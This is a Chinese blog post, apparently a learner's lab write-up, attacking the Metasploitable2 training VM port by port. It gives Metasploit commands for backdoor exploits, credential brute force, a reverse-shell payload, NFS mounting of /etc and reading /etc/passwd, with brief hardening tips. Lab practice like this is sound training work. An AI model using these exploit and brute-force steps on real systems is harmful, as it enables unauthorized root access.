靶场练习-Metasploitable2

偷了个懒,打开靶场看了一下IP地址192.168.3.204;

红色部分不会做,求大家指点。

打开Kali,运行MSF后search portscan,使用/tcp选线,set一下rhost,run;

可以看到得到的信息很少,使用nmap192.168.3.204 -p 1-10000 -A -O查询,然后对照着看;

接下来一个一个来:

1,Port:21,FTP,vsftpd2.3.4

search vsftpd;搜索一下这个服务

use 0;只有一个,使用

options;只有一个参数需要输入

set rhost 192.168.3.204;直接输入ip

run;之后id看到是root

总结:尽量不要使用ftp服务了,如果必须使用,密码规则一定要严格

2,Port:22,SSH,Openssh4.71

search ssh_login

use 0;是ssh_login不带pubkey的选项

options;看到有很多参数需要输入,而且其中用户名密码不是不选项

set rhost 192.168.3.204;直接输入

set pass_file /temp/1.txt;为了直接看效果,提前准备好的,也可以用kali中的

set user_file /temp/1.txt;如上

run;看到结果,用finalshell直接登陆

总结:变更端口和密码复杂度要求

3,Port:23,telnet,linuxtelnet

search telnet;

use 34;就是telnet_login选项

后面同上

总结:尽量不要使用ftp服务了,如果必须使用,密码规则一定要严格

4,Port:25,smtp,Postfix smtpd

search smtp;

use 25;用smtp_enum

options;

set rhosts192.168.3.204;

run;看到跑出一些账户,可以用其他工具在此暴力破解

总结:如果必须使用,密码规则一定要严格

5,Port:53,domain,IscBind9.4.2

这个没有头绪,先放着

6,Port:80,http,Apachehttpd2.2.8

浏览器输入192.168.3.204:80,看到有一些路径,其中有个靶场,还有phpmyadmin;

尝试一下phpinfo.php,访问成功,发现服务器加入了cgi,于是search php cgi;

use 8;php_cgi

options;

set rhost 192.168.3.204;

run;貌似进入目标服务器了

cat etc/passwd;可到用户,可以配合暴力破解

shell;打算msfvenom一个木马从靶机下载执行,或者配置CS一个木马试着再靶机上执行,这样看看效果来着,但是shell之后不能敲回车,暂时放置

总结:服务升级

7,Port:111/2049,rpcbind,rpc

看到这个端口,百度了一下是网络文件服务相关的,一般和2049端口配合使用,看了一下端口开放情况确实有此端口开放;

根据开启了rpcbind,安装NFS客户端来进行连接测试;

apt-get install nfs-common;安装客户端

showmount -e 192.168.3.204;发现根目录共享了

mkdir -p /temp/etc;本地建立映射文件夹

mount -t nfs 192.168.3.204:/etc /temp/etc;挂载到本地(也可以整个根目录挂载)

总结:特别注意服务器端的设置

8,Port:139/445,samba,samba3.x

search samba;看到这个,首先想到的是永恒之蓝139/445,但是看到描述有个命令执行的

use 8;执行这个试试看

options;

set rhost 192.168.3.204;

run;得到的是root权限

总结:还是注意打开防火墙吧

9,Port:512/513/514,exec,netkit-rsh

search rlogin;先查了一下这个端口的相关漏洞信息,Linux Rexec服务端口,对Rlogin登录可能存在爆破

use 3;爆破,设置用户密码文件,但是没有跑成功

总结:这块不太懂,没有查到能看懂的资料,在网上找到的直接得到sell的方法,没成功

10,Port:1009,java-rmi,GUN

search java rmi;远程命令执行

use 4;java_rmi_server这个选项

set rhost 192.168.3.204;

run;之后能得到shell,然后id看到root权限

11,Port:1524,bindshell,Metasploitable root shell

作为一只菜猫,看到这个端口比较迷糊,然后百度一下,看到是已有后门,直接使用telnet连接即可

12,Port:2121,ftp,Proftp

应该是爆破,没找到相关文章

13,Port:3306,mysql,Mysql5.0.51

search mysql;

use 17;爆破

set rhost 192.168.3.204;

set user_file /tmp/1.txt

set pass_file /tmp/1.txt

run;得到root:空秘密

14,Port:3632,distccd,distccd

search distccd;剩下的都差不多

总结:很多没有payload的我发现可以用set payload cmd/unix/reverse,不知道是不是我用错了,还是真的可以,求指点。

15,Port:5432,PG;postgreSQL

与上道题类似

16,Port:5900,VNC,VNC

与上道题类似

17,Port:6000,X11,无

不懂,百度结果:6000端口是在Linux系统中用于X Window系统的网络服务端口,还有一条(CVE-2020-8195)Citrix 未授权访问漏洞

总结:依旧没找到方法,网上的方法也无法操作

18,Port:6667/6697,irc,unrealircd

继续百度:IRC是Inter Relay chat的缩写,是网络上一种聊天的服务器。。。

search unrealircd;

set rhost 192.168.3.204;

set lhost 192.168.3.99;

run;root权限

19,Port:8009,ajp13,ApacheJserv

search Jserv;

set rhost 192.168.3.204;

run;只是导出一个文件,不知道有啥用,求指点。

20,Port:8180,http,ApacheTomcat

search tomcat login;还是暴力破解吧

set rhost 192.168.3.204;

set rport 8180;

run;看到tomcat:tomcat可以登陆

21,Port:8787,drb,Ruby drb rmi 1.8.0

search drb;然后,然后就没有然后了。。。

总结:这个不会,而且找到的资料验证失败了,求指点。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值